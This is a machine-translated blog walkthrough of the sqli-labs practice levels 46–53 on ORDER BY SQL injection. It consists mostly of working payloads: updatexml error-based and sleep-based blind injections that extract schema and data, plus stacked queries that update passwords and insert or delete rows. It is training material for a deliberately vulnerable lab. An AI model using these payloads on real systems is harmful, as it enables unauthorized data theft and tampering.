当前位置:网站首页>SQL Lab (46~53) (continuous update later) order by injection

SQL Lab (46~53) (continuous update later) order by injection

2022-07-07 12:24:00 hcjtn

(46~50)

sql-lab-46

As soon as you enter 46 Close the page and prompt us to use sort :

[ Failed to transfer the external chain picture , The origin station may have anti-theft chain mechanism , It is suggested to save the pictures and upload them directly (img-p8wYua6X-1643081745033)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220123100744179.png)]

We try to use this ?sort=1 Find out :

[ Failed to transfer the external chain picture , The origin station may have anti-theft chain mechanism , It is suggested to save the pictures and upload them directly (img-7rA2s6bx-1643081745034)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220123101113651.png)]

then ?sort=2:
Insert picture description here

?sort=3:
Insert picture description here

We found that when we use sort=1 when The table is arranged in the first column ,sort=2 when The table is arranged in the second column , sort=3 when The table is sorted in the third column . We thought about it order by function , Guess may be related to order by Function related injection .

View source code :

$sql = "SELECT * FROM users ORDER BY $id";

We found that our guess was indeed right .

Let's get to know order by Parameter injection :

order by Injection means that the following parameters are controllable ,

order by It's different from what we're doing here where Injection point after , Out of commission union Isoinjection , Then you can follow An error injection perhaps Time blind note .

Judge database name :?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

Name of judgment table :?sort=-1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1)-- q

Judge the listing :?sort=-1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q

Query data :?sort=-1 and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q

sql-lab-47

Principle and 46 It's the same , The difference is only closed difference

Judge database name :?sort=-1 'and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

Name of judgment table :?sort=-1 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1)-- q

Judge the listing :?sort=-1’and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q

Query data :?sort=-1 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q

sql-lab-48

Only time blind injection can be used in this level :

Use time blind injection

  1. Resolve database name :?sort=1 and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s

  2. Resolve table name :?sort=1 and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e

  3. Resolve field name :?sort=1 and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i

  4. get data : ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q

sql-lab-49

The same as the forty-eight level , It's just the difference in the way of closure

  1. Resolve database name :?sort=1 'and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s

  2. Resolve table name :?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e

  3. Resolve field name :?sort=1’and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i

  4. get data : ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q

sql-lab-50

Enter the topic , I found that it is quite different from the previous questions , The sentences we input will still be spliced into order by Back , So try to use error injection , Discovery is indeed possible , So what's the difference between this question and the previous one ?

Let's look at the source code :

mysqli_multi_query($con1, $sql)

So this problem is stack injection and order by Injected combination

?sort=1;update users set password=‘hcjtn’ where id=14–q

?sort=1;insert into users values(50,‘50’,‘50’)-- q

(51~53)

sql-lab51

The practice is consistent with the previous question , It's just a closed difference .

Use error injection or time blind injection :

Error injection is used here :

Judge database name :?sort=-1 'and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

Name of judgment table :?sort=-1 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1)-- q

Judge the listing :?sort=-1’and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q

Query data :?sort=-1 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q

Then stack injection :

?sort=1’;insert into users values(21,‘02’,‘24’)-- q

sql-lab-52

The same routine, the same method , First judge the closing mode It is found that the question is not closed , Then try to use error reporting , Pop up the library name , Found to be unusable , Then we can only use time blind annotation in this topic :

  1. Resolve database name :?sort=1’and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s

  2. Resolve table name :?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e

  3. Resolve field name :?sort=1’and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i

  4. get data : ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q

Then stack injection :

?sort=1 ;delete from users where id=50 – q

sql-lab-53

First judge the closing mode , Found no closure .

  1. Resolve database name :?sort=1 'and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s

  2. Resolve table name :?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e

  3. Resolve field name :?sort=1 'and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i

  4. get data : ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q

Then stack injection :

?sort=1’ ;delete from users where id=50 – q

原网站

版权声明
本文为[hcjtn]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202130618271389.html

边栏推荐

猜你喜欢

随机推荐